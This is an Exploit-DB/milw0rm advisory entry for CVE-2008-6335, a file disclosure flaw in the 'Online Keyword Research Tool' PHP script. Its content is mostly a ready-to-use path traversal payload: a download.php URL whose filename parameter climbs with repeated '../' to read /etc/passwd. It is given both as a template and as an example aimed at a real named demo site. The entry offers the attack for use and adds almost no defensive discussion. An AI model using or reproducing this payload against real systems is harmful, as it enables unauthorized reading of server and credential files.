Online Keyword Research Tool download.php File Disclosure Vuln

2008-12-19T00:00:00
ID EDB-ID:7524
Type exploitdb
Reporter Cold Zero
Modified 2008-12-19T00:00:00

Description

Online Keyword Research Tool (download.php) File Disclosure Vuln. CVE-2008-6335. Webapps exploit for php platform

                                        
                                            Online Keyword Research (download.php filename) Local File Include

# author : Cold z3ro, http://www.hackteach.org/
# script : http://secure.emetrix.com/order/product.asp?PID=68900247
# demo   : http://www.rightscripts.com/keywordresearch/


# Exploit

[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd


# Example

[~] http://www.rightscripts.com/keywordresearch/download.php?filename=../../../../../../../../etc/passwd



============================
Greetz : www.hackteach.org members , AnGeL25dZ

# milw0rm.com [2008-12-19]